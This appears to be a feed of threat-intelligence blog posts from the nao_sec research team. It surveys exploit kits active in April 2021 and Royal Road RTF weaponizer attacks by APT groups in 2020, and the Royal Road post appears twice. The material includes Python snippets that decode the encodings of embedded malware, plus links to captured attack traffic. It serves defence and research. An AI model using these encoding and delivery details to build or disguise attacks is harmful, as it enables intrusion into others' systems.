Note: This blog post doesn’t make sense to many It’s 2021 now. Moreover, the quarter has already passed. I thought Drive-by Download attack was dead four years ago. Angler Exploit Kit has disappeared, pseudo-Darkleech and EITest campaign have disappeared, and RIG Exploit Kit has also declined. At that time, Drive-by Download attack was definitely supposed to die. However, even if in 2021, it will not disappear fire still slightly. In April 2021, I received some incredible notices. For example, there are the following notifications. <ul> <li>PurpleFox Exploit Kit has started exploiting CVE-2021-26411</li> <li>RIG Exploit Kit has started exploiting CVE-2021-26411</li> <li>Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411</li> <li>Underminer Exploit Kit is back</li> </ul> Repeat again. It’s 2021 now. Not 2017. Internet Explorer was taken away by Chrome and Edge, and Drive-by Download attack was supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of your friends. <ol> <li>Internet Explorer is still used in some countries/regions including Japan</li> <li>Due to the influence of corona, remote work has increased, and the number of users with network security vulnerabilities has increased</li> <li>Internet Explorer vulnerabilities still discovered and exploit code published</li> </ol> In reality, these are intricately intertwined, and there may be different reasons. In any case, Drive-by Download attacks are still being observed. Moreover, it is a little more active. This is irrelevant for most people. Because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use Chrome’s 0day, which is not discussed here. For the few enthusiastic Internet Explorer users that exist, I write this blog post. In other words, as of April 2021, I will introduce the characteristics of common Drive-by Download attacks that you may encounter. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post. <h2 id="exploit-kit-landscape">Exploit Kit Landscape</h2> As of April 2021, the following 6 types of Exploit Kits have been observed to be active. <ul> <li>RIG</li> <li>Spelevo</li> <li>PurpleFox</li> <li>Underminer</li> <li>Bottle</li> <li>Magnitude</li> </ul> nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data observed by this is as follows. Some Exploit Kits are not counted because they are observed in different environments. <img src="https://nao-sec.org/assets/2021-04-16/ek.png" alt="" /> The features of the 6 types of Exploit Kits currently observed are as follows. <table> <thead> <tr> <th> </th> <th>Private</th> <th>Update</th> <th>Exploit</th> </tr> </thead> <tbody> <tr> <td>RIG</td> <td>No</td> <td>Yes</td> <td>CVE-2020-0674, CVE-2021-26411</td> </tr> <tr> <td>Spelevo</td> <td>No</td> <td>No</td> <td>CVE-2018-8174, CVE-2018-15982</td> </tr> <tr> <td>PurpleFox</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> <tr> <td>Underminer</td> <td>Yes</td> <td>No</td> <td>CVE-2018-15982</td> </tr> <tr> <td>Bottle</td> <td>Yes</td> <td>Yes</td> <td>CVE-2020-1380, CVE-2021-26411</td> </tr> <tr> <td>Magnitude</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> </tbody> </table> Here is sample traffic for each. <h3 id="rig-exploit-kit">RIG Exploit Kit</h3> RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021. RIG started abusing CVE-2021-26411 in April 2021 and are still incorporating changes. Landing Pages are not obfuscated as they used to be. Very simple code. The malware is RC4 encrypted. <img src="https://nao-sec.org/assets/2021-04-16/rig.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/rig.saz">here</a>. <h3 id="spelevo-exploit-kit">Spelevo Exploit Kit</h3> Spelevo is an Exploit Kit that appeared in 2019. 2020 was very mature, but 2021 is one of the most active Exploit Kits. Spelevo hasn’t changed for a long time. Spelevo hides the malware in the image. See this article[2] for detailed behavior. <img src="https://nao-sec.org/assets/2021-04-16/spelevo.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/spelevo.saz">here</a>. <h3 id="purplefox-exploit-kit">PurpleFox Exploit Kit</h3> PurpleFox is an Exploit Kit that has been active since 2019. A private exploit kit for sending PurpleFox malware. It’s enthusiastic about exploit and is fairly fast at incorporating new vulnerabilities. Spelevo has started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time. <img src="https://nao-sec.org/assets/2021-04-16/purplefox.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/purplefox.saz">here</a>. <h3 id="underminer-exploit-kit">Underminer Exploit Kit</h3> Underminer is an Exploit Kit that appeared in 2018. It’s a pretty distinctive Exploit Kit. It is known to be extremely difficult to analyze. It is used to deliver its unique malware called Hidden Bee. See this article[3] for more details. Underminer has a cycle of activity for several months and then silence for several months. It has been silent since the November 2020, but was revived in April 2021. But the essence hasn’t changed at all. <img src="https://nao-sec.org/assets/2021-04-16/underminer.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/underminer.saz">here</a>. <h3 id="bottle-exploit-kit">Bottle Exploit Kit</h3> Bottle is an Exploit Kit that appeared in 2019. An extremely rare Exploit Kit that targets only Japan. It is used to deliver its unique malware called Cinobi. It is one of the most active Exploit Kits in Japan. It has not been observed since November 2020, but it was revived in April 2021. It’s also worth noting that unlike other Exploit Kits, it exploits CVE-2020-1380 and CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details. <img src="https://nao-sec.org/assets/2021-04-16/bottle.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/bottle.saz">here</a>. <h3 id="magnitude-exploit-kit">Magnitude Exploit Kit</h3> Magnitude is one of the oldest existing Exploit Kits. It has been observed only in certain countries/regions such as South Korea and Taiwan, and the details have not been reported much. Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving. <blockquote class="twitter-tweet">One more: <a href="https://twitter.com/hashtag/MagnitudeEK?src=hash&ref_src=twsrc%5Etfw">#MagnitudeEK</a> <a href="https://t.co/pOuIZzAPZG">pic.twitter.com/pOuIZzAPZG</a>— Jérôme Segura (@jeromesegura) <a href="https://twitter.com/jeromesegura/status/1382395637480656896?ref_src=twsrc%5Etfw">April 14, 2021</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <h2 id="finally">Finally</h2> Drive-by Download attacks are still observed in 2021. It has nothing to do with most people. As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist with Internet Explorer. <h2 id="references">References</h2> [1] <a href="https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf">https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf</a> [2] <a href="https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit">https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit</a> [3] <a href="https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/">https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/</a> [4] <a href="http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf">http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf</a>
Royal Road! Re:Dive

Mon, 04 Jan 2021 15:00:00 -0000

Abstract We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020. Previous Blog Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF file generated by it has various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”. Exploiting a vulnerability in Microsoft Office Equation Editor Containing an object named “8.t” However, some RTF files are likely to be related to Royal Road, even though they don’t meet the second condition. For classification purposes, we refer to this as “Related Samples”. In reality, this may also be an RTF file generated by Royal Road, but the truth is only known to the attacker. Due to the our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below. And Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group alias is written for reference. Strictly speaking, these can be different. For example, TA428 and Pirate Panda are not exactly equivalent. Temp.Tick (BRONZE BUTLER, RedBaldKnight) Temp.Conimes (Goblin Panda, Cycldek) Temp.Periscope (Leviathan, APT40) Temp.Trident (Dagger Panda, IceFog) Tonto (Karma Panda, CactusPete, LoneRanger) TA428 (Pirate Panda) Rancor Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common. Updates It’s been a year since we introduced Royal Road. In the meantime, the RTF file, believed to have been generated by Royal Road, has been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates. The RTF file generated by Royal Road contains encoded malware. It is decoded by Shellcode after exploit. In our previous blog, we introduced the following 5 encodings. 4D 5A 90 00 (not encoded) F2 A3 20 72 B2 A6 6D FF B0 74 77 46 B2 5A 6F 00 Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used the new encodings. The following 2 encodings. A9 A4 6E FE This encoding can be decoded with code like the following: dec_data = [] for i in range(len(enc_data)): dec_data.append(((int.from_bytes(enc_data[i], "little") ^ 0x7b) + 0x7b) % 256) 94 5F DA D8 This encoding can be decoded with code like the following: dec_data = [] xor_key = 1387678300 for i in range(len(enc_data)): for _ in range(7): x0 = (xor_key & 0x20000000) == 0x20000000 x1 = (xor_key & 8) == 8 x2 = xor_key & 1 x3 = 1 + (x0 ^ x1 ^ x2) xor_key = (xor_key + xor_key) + x3 dec_data.append(int.from_bytes(enc_data[i], "little") ^ (xor_key % 256)) Our tool for decrypting Royal Road encoded object is already available on GitHub. It also supports the above new encodings. https://github.com/nao-sec/rr_decoder New Attack Groups As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020. Temp.Conimes Tonto TA428 Naikon Higaisa Vicious Panda FunnyDream TA410 Of these, we have already reported on 1-3 attack groups in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia. And the TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan). Please refer to that. For Naikon, CheckPoint Research reported [6], but unfortunately, we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8). Higaisa Higaisa is an attack group that seems to have been active since at least around 2016. It is primarily targeted at North Korean-related organizations and is believed to be aimed at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. The blogs have been written by Tencent and Positive Technologies so far [7][8][9], and are attributed to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and it was reported that it might belong to China. We observed an attack by Higaisa on Royal Road in March 2020. The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018. Vicious Panda Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia such as Russia, Mongolia, and Ukraine. We observed an attack on the Royal Road by Vicious Panda in March 2020. It has been reported to execute malware similar to Enfal and BYEBY. FunnyDream FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream. We observed an attack by FunnyDream from March to May 2020. Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decoded the config using two numeric data and communicates with the C&C server using its original protocol using Blowfish. TA410 TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. The report has been published by Proofpoint [15][16][17] and is mainly targeted at public sector in the US. It uses malware called LockBack and FlowCloud. We observed an attack by TA410 in October 2020. FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud has been reported to be v4 and v5, but the FlowCloud we observed at this time was similar to v4. Attack case against Japan In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of attacks on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us… The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to the email. These RTF files did not contain an 8.t object, however did contain an associated object. This is the malware encoded by the 4th (B0 74 77 46) encoding shown above. The overall picture of the attack is as follows. The malware executed was an unknown RAT. We call this XLBug RAT because of the characteristics left in this RAT. The RAT held information such as C&C server encoded by Base64 and XOR. The following commands are implemented in XLBug RAT. Get directory information Get file information Get computer information Execute file Upload file Download file Rename file Delete file Delete itself The naming convention and encoding of the encoded object contained in the RTF are similar to those of the TA428. However, we could not say that this was a TA428 attack. Relationship In the previous blog, we summarized the characteristics of attack groups that use Royal Road. We used it to divide the attack groups into two groups. However, by 2020, those characteristics are almost meaningless. It has been standardized or deleted. It’s not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close. We do not classify further, but if you have any comments please let us know. Yara Rule The GitHub repository we shared in the previous blog is still being updated. https://github.com/nao-sec/yara_rules IOC The IOC sheet shared in the previous blog is still being updated. https://nao-sec.org/jsac2020_ioc.html Tool The tool used by Royal Road to decrypt encoded object is still being updated. https://github.com/nao-sec/rr_decoder Wrap-Up The attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but other attacks by different attack groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. The attacks on Japan have also been observed and we were unable to identify this with a known attack group. The use of Royal Road by these unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, that appear to share tools among multiple targeted attack groups. We should continue to pay close attention to these tool sharing cases. Acknowledgments “nao_sec” is an independent research team that does not belong to any company. Individuals belong to each company and engage in research, but the activities of nao_sec still maintain their independence from each company. We are grateful to all of you who cooperated with our research activities every day. References [1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/ [7] Tencent, “APT攻击组织”黑格莎（Higaisa）”攻击活动披露”, https://s.tencent.com/research/report/836.html [8] Tencent, ““Higaisa（黑格莎）”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/ [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/ [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

<img src="https://nao-sec.org/assets/2021-01-05/00.png" alt="" /> <h2 id="abstract">Abstract</h2> We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020. <h2 id="previous-blog">Previous Blog</h2> Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF file generated by it has various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”. <ol> <li>Exploiting a vulnerability in Microsoft Office Equation Editor</li> <li>Containing an object named “8.t”</li> </ol> However, some RTF files are likely to be related to Royal Road, even though they don’t meet the second condition. For classification purposes, we refer to this as “Related Samples”. In reality, this may also be an RTF file generated by Royal Road, but the truth is only known to the attacker. Due to the our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below. And Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group alias is written for reference. Strictly speaking, these can be different. For example, TA428 and Pirate Panda are not exactly equivalent. <ol> <li>Temp.Tick (BRONZE BUTLER, RedBaldKnight)</li> <li>Temp.Conimes (Goblin Panda, Cycldek)</li> <li>Temp.Periscope (Leviathan, APT40)</li> <li>Temp.Trident (Dagger Panda, IceFog)</li> <li>Tonto (Karma Panda, CactusPete, LoneRanger)</li> <li>TA428 (Pirate Panda)</li> <li>Rancor</li> </ol> Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common. <img src="https://nao-sec.org/assets/2021-01-05/01.png" alt="" /> <h2 id="updates">Updates</h2> It’s been a year since we introduced Royal Road. In the meantime, the RTF file, believed to have been generated by Royal Road, has been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates. The RTF file generated by Royal Road contains encoded malware. It is decoded by Shellcode after exploit. In our previous blog, we introduced the following 5 encodings. <ol> <li>4D 5A 90 00 (not encoded)</li> <li>F2 A3 20 72</li> <li>B2 A6 6D FF</li> <li>B0 74 77 46</li> <li>B2 5A 6F 00</li> </ol> Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used the new encodings. The following 2 encodings. <ol> <li>A9 A4 6E FE</li> </ol> <img src="https://nao-sec.org/assets/2021-01-05/02.png" alt="" /> This encoding can be decoded with code like the following: <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dec_data = [] for i in range(len(enc_data)): dec_data.append(((int.from_bytes(enc_data[i], "little") ^ 0x7b) + 0x7b) % 256) </code></pre></div></div> <ol> <li>94 5F DA D8</li> </ol> <img src="https://nao-sec.org/assets/2021-01-05/03.png" alt="" /> This encoding can be decoded with code like the following: <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dec_data = [] xor_key = 1387678300 for i in range(len(enc_data)): for _ in range(7): x0 = (xor_key & 0x20000000) == 0x20000000 x1 = (xor_key & 8) == 8 x2 = xor_key & 1 x3 = 1 + (x0 ^ x1 ^ x2) xor_key = (xor_key + xor_key) + x3 dec_data.append(int.from_bytes(enc_data[i], "little") ^ (xor_key % 256)) </code></pre></div></div> Our tool for decrypting Royal Road encoded object is already available on GitHub. It also supports the above new encodings. <a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a> <h2 id="new-attack-groups">New Attack Groups</h2> As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020. <ol> <li>Temp.Conimes</li> <li>Tonto</li> <li>TA428</li> <li>Naikon</li> <li>Higaisa</li> <li>Vicious Panda</li> <li>FunnyDream</li> <li>TA410</li> </ol> Of these, we have already reported on 1-3 attack groups in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia. And the TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan). Please refer to that. For Naikon, CheckPoint Research reported [6], but unfortunately, we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8). <h3 id="higaisa">Higaisa</h3> Higaisa is an attack group that seems to have been active since at least around 2016. It is primarily targeted at North Korean-related organizations and is believed to be aimed at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. The blogs have been written by Tencent and Positive Technologies so far [7][8][9], and are attributed to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and it was reported that it might belong to China. We observed an attack by Higaisa on Royal Road in March 2020. <img src="https://nao-sec.org/assets/2021-01-05/04.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/05.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/06.png" alt="" /> The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018. <img src="https://nao-sec.org/assets/2021-01-05/07.png" alt="" /> <h3 id="vicious-panda">Vicious Panda</h3> Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia such as Russia, Mongolia, and Ukraine. We observed an attack on the Royal Road by Vicious Panda in March 2020. <img src="https://nao-sec.org/assets/2021-01-05/08.png" alt="" /> It has been reported to execute malware similar to Enfal and BYEBY. <img src="https://nao-sec.org/assets/2021-01-05/09.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/10.png" alt="" /> <h3 id="funnydream">FunnyDream</h3> FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream. We observed an attack by FunnyDream from March to May 2020. <img src="https://nao-sec.org/assets/2021-01-05/11.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/12.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/13.png" alt="" /> Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decoded the config using two numeric data and communicates with the C&C server using its original protocol using Blowfish. <h3 id="ta410">TA410</h3> TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. The report has been published by Proofpoint [15][16][17] and is mainly targeted at public sector in the US. It uses malware called LockBack and FlowCloud. We observed an attack by TA410 in October 2020. <img src="https://nao-sec.org/assets/2021-01-05/15.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/16.png" alt="" /> FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud has been reported to be v4 and v5, but the FlowCloud we observed at this time was similar to v4. <h2 id="attack-case-against-japan">Attack case against Japan</h2> In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of attacks on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us… The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to the email. <img src="https://nao-sec.org/assets/2021-01-05/18.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/19.png" alt="" /> These RTF files did not contain an 8.t object, however did contain an associated object. This is the malware encoded by the 4th (B0 74 77 46) encoding shown above. <img src="https://nao-sec.org/assets/2021-01-05/20.png" alt="" /> The overall picture of the attack is as follows. <img src="https://nao-sec.org/assets/2021-01-05/21.png" alt="" /> The malware executed was an unknown RAT. We call this XLBug RAT because of the characteristics left in this RAT. The RAT held information such as C&C server encoded by Base64 and XOR. <img src="https://nao-sec.org/assets/2021-01-05/22.png" alt="" /> The following commands are implemented in XLBug RAT. <ul> <li>Get directory information</li> <li>Get file information</li> <li>Get computer information</li> <li>Execute file</li> <li>Upload file</li> <li>Download file</li> <li>Rename file</li> <li>Delete file</li> <li>Delete itself</li> </ul> The naming convention and encoding of the encoded object contained in the RTF are similar to those of the TA428. However, we could not say that this was a TA428 attack. <h2 id="relationship">Relationship</h2> In the previous blog, we summarized the characteristics of attack groups that use Royal Road. We used it to divide the attack groups into two groups. However, by 2020, those characteristics are almost meaningless. It has been standardized or deleted. It’s not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close. We do not classify further, but if you have any comments please let us know. <h2 id="yara-rule">Yara Rule</h2> The GitHub repository we shared in the previous blog is still being updated. <a href="https://github.com/nao-sec/yara_rules">https://github.com/nao-sec/yara_rules</a> <h2 id="ioc">IOC</h2> The IOC sheet shared in the previous blog is still being updated. <a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a> <h2 id="tool">Tool</h2> The tool used by Royal Road to decrypt encoded object is still being updated. <a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a> <h2 id="wrap-up">Wrap-Up</h2> The attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but other attacks by different attack groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. The attacks on Japan have also been observed and we were unable to identify this with a known attack group. The use of Royal Road by these unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, that appear to share tools among multiple targeted attack groups. We should continue to pay close attention to these tool sharing cases. <h2 id="acknowledgments">Acknowledgments</h2> “nao_sec” is an independent research team that does not belong to any company. Individuals belong to each company and engage in research, but the activities of nao_sec still maintain their independence from each company. We are grateful to all of you who cooperated with our research activities every day. <hr /> <h2 id="references">References</h2> [1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/ [7] Tencent, “APT攻击组织”黑格莎（Higaisa）”攻击活动披露”, https://s.tencent.com/research/report/836.html [8] Tencent, ““Higaisa（黑格莎）”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/ [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/ [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
An Overhead View of the Royal Road

Wed, 29 Jan 2020 15:00:00 -0000

